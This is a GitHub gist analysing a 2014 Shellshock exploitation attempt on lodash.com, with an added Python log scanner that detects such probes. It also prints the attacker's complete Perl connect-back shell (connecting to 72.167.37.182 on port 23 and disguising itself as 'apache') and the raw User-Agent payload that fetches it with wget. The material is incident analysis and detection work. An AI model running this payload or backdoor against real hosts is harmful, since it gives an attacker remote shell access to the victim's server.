@mathiasbynens mathiasbynens/README.md
Last active Aug 29, 2015

Someone tried to exploit the Shellshock vulnerability in Bash on lodash.com, likely as part of a mass-exploit attempt.

In this case the payload, delivered in the User-Agent header of a request for /cgi-sys/defaultwebpage.cgi (see the access log entry below), used wget to fetch a modified version of @schierlm’s pseudo-terminal Perl script pmsh.pl into /tmp/a.pl. The modified script connects back to 72.167.37.182 on port 23 and attaches a shell to a freshly allocated pseudo-terminal over that connection. The download URL carries the targeted host name as a query parameter (?h=lodash.com), so the attacker’s own web server log tells them which hosts fetched the script and therefore might have the /tmp/a.pl backdoor in place.
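Added here as an example (not code from the gist or from its author), the following Python scans Apache combined-format access log lines for the Shellshock trigger, the `() {` function-definition prefix in an attacker-controlled header, and pulls out the command that follows it, any URL it fetches, the ?h= host tag described above and the file wget writes to. The three sample lines are constructed for the example: the first reproduces the entry on this page, the other two are made up (one benign, one with the payload in the Referer header instead). Field names and the regular expressions are my own.

```python
"""Detect Shellshock (CVE-2014-6271) probes in Apache combined-format access logs.

Added example, not code from the gist. Parses each line, looks for the "() {"
function-definition prefix in any attacker-controlled header field, and
extracts the trailing command, fetched URLs, the ?h= target tag and the
path wget is told to write to.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines. The first reproduces the entry on this page; the
# other two are made up (one benign, one with the payload in the Referer).
SAMPLE_LOG = r'''109.95.210.196 - - [26/Sep/2014:06:36:30 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=lodash.com -O /tmp/a.pl\""
203.0.113.7 - - [26/Sep/2014:06:40:01 +0200] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
198.51.100.9 - - [26/Sep/2014:06:41:13 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 404 224 "() { :; }; /bin/bash -c \"id\"" "curl/7.37.0"'''

# Apache "combined" format. Quoted fields may contain \" escapes, as the
# User-Agent above does, so a naive split on '"' would break the fields.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# The Shellshock trigger: an environment value that begins with a bash
# function definition "() { ... }" followed by extra commands, which a
# vulnerable bash executed while importing the environment. Whitespace is
# optional, so "() {" and "(){" both count.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;?\s*(?P<command>.+)')

URL_RE = re.compile(r'https?://[^\s"\']+')
WGET_OUTPUT_RE = re.compile(r'\s-O\s+([^\s"\']+)')


def unescape(field):
    """Undo Apache's backslash escaping inside a quoted log field."""
    return re.sub(r'\\(.)', r'\1', field)


def parse_line(line):
    """Split one combined-format line into a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    for key in ('request', 'referer', 'agent'):
        fields[key] = unescape(fields[key])
    return fields


def find_shellshock(fields):
    """Return details of a Shellshock payload found in any attacker-controlled
    field, or None. mod_cgi exports request headers as HTTP_* environment
    variables, so Referer and User-Agent both reach bash, not just the UA."""
    for field in ('agent', 'referer', 'request'):
        m = SHELLSHOCK_RE.search(fields[field])
        if not m:
            continue
        command = m.group('command').strip()
        urls = URL_RE.findall(command)
        # The ?h= tag: the attacker's server log records which target fetched the script.
        tags = [h for u in urls for h in parse_qs(urlsplit(u).query).get('h', [])]
        drop = WGET_OUTPUT_RE.search(command)
        return {
            'ip': fields['ip'],
            'field': field,
            'command': command,
            'urls': urls,
            'target_tags': tags,
            'dropped_file': drop.group(1) if drop else None,
        }
    return None


def scan(log_text):
    """Return one hit dict per log line carrying a Shellshock payload."""
    hits = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if fields is None:
            continue
        hit = find_shellshock(fields)
        if hit:
            hits.append(hit)
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ip']} via {hit['field']}: {hit['command']}")
        if hit['urls']:
            print(f"  fetches {hit['urls']} (tag {hit['target_tags']}) -> {hit['dropped_file']}")
```

Run against a real log with `scan(open('access.log').read())`. Matching on the `() {` prefix rather than on `/bin/bash` or `wget` catches variants that use a different interpreter or download tool; the extracted URLs and -O paths are what you would then pivot on (blocklist the dropper host, check the path on every host that fetched it).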

#!/usr/bin/perl -w
# Connect-back shell over a pseudo-terminal. This is the file the Shellshock
# payload fetched into /tmp/a.pl: Michael Schierl's pmsh.pl with the
# connect-back address set to 72.167.37.182:23 and the process name disguised.
use IO::Socket;
use Fcntl;
# IOCTLs (Linux values: TIOCGPTN = 0x80045430, which is -2147199952 as a signed
# 32-bit int; TIOCSPTLCK = 0x40045431). TIOCGPTN returns the slave number of a
# /dev/ptmx master, TIOCSPTLCK unlocks the slave so it can be opened.
$TIOCGPTN = -2147199952;
$TIOCSPTLCK = 1074025521;
$EAGAIN=11;
print "pmsh.pl v0.1 (c) 2006 Michael Schierl <schierlm-public AT gmx DOT de>\n";
# Hardcoded connect-back host and port (23, the telnet port).
$HOST="72.167.37.182";
$PORT="23";
# Rewrite argv[0] so the process shows up as "apache" in ps output.
$0="apache";
print "Connecting to $HOST:$PORT... ";
# Non-blocking socket: the forwarding loop below relies on EAGAIN.
$sock = new IO::Socket::INET (
PeerAddr => $HOST,
PeerPort => $PORT,
Proto => 'tcp',
Blocking => 0,
) or die $!;
print "ok\nAllocating pseudo terminal... ";
## ptsname: open the master side and ask the kernel which /dev/pts/N it got
sysopen (PTMX, '/dev/ptmx', O_RDWR|O_NONBLOCK) or die $!;
$tmp='';
ioctl (PTMX, $TIOCGPTN, $tmp) or die $!;
$pts = unpack('i', $tmp);
print "/dev/pts/$pts\nInitializing pseudo terminal... ";
## grantpt not needed on devpts
## unlockpt
$unlock=pack('i', 0);
ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!;
## prepare daemonizing: detach from the working directory and from stdin
chdir '/' or die $!;
open STDIN, '/dev/null' or die $!;
umask 0;
print "ok\nForking shell thread...";
# First fork: the foreground process exits, leaving the backdoor in the background.
defined($pid = fork) or die $!;
exit if $pid;
# Second fork: the child attaches a shell to the slave side of the pty; the
# parent stays behind to shuttle bytes between the pty master and the socket.
defined($pid = fork) or die $!;
if (!$pid) {
# getty gives a proper login-style session on the slave; fall back to bash
# with its standard streams redirected to the slave if getty is unavailable.
exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or
exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts") or
die $!;
exit;
}
print "ok\nHave fun!\n";
# Silence the remaining local output; everything from here on goes over the socket.
open STDOUT, '>>/dev/null' or die $!;
open STDERR, '>>/dev/null' or die $!;
$pp = PTMX;
# select(2) read set: wake up when either the pty master or the socket is readable.
$rin=$win=$ein='';
vec($rin,fileno($pp),1) =1;
vec($rin,fileno($sock),1) = 1;
# Unbuffer all three handles so nothing sits in Perl's stdio buffers.
select $sock;
$|=1;
select PTMX;
$|=1;
select STDOUT;
$|=1;
$finished=0;
# Drain $from into $to until a read would block; EOF on either side ends the session.
sub forwarddata {
my ($from,$to) = @_;
while(1) {
$rv = sysread($from, $buff, 1024);
last if (!defined($rv) && $! == $EAGAIN);
defined($rv) or die $!;
if ($rv == 0) { $finished = 1; last;}
while(length $buff > 0) {
$rv = syswrite($to, $buff, length $buff);
if (!defined($rv) && $! == $EAGAIN) {
## try again
next;
}
defined($rv) or die $!;
last if ($rv == length $buff);
substr($buff,0,$rv) = '';
}
}
}
# Relay loop: block in select until something is readable, then pump both directions.
while(! $finished) {
$nfound = select($rout=$rin, $wout=$win, $eout=$ein, undef);
die $! if ($nfound == -1);
forwarddata($pp,$sock);
last if $finished;
forwarddata($sock,$pp);
last if $finished;
}
close PTMX;
close $sock;
# Dead assignment that only keeps -w from warning that $wout/$eout/$rout are used once.
$wout=$eout.$wout.$rout;
109.95.210.196 - - [26/Sep/2014:06:36:30 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=lodash.com -O /tmp/a.pl\""
schierlm commented Sep 26, 2014

Wow, people are using old scripts of mine and are even too lazy to remove the copyright notice :)

Nowadays, in most cases you can use script /dev/null instead to allocate you a pseudo terminal. But I wouldn't use it in initial exploitation (only where I have permission of course, I don't access random hosts on the 'net) anyway - just give me a "raw shell", I can later upgrade it if needed :)
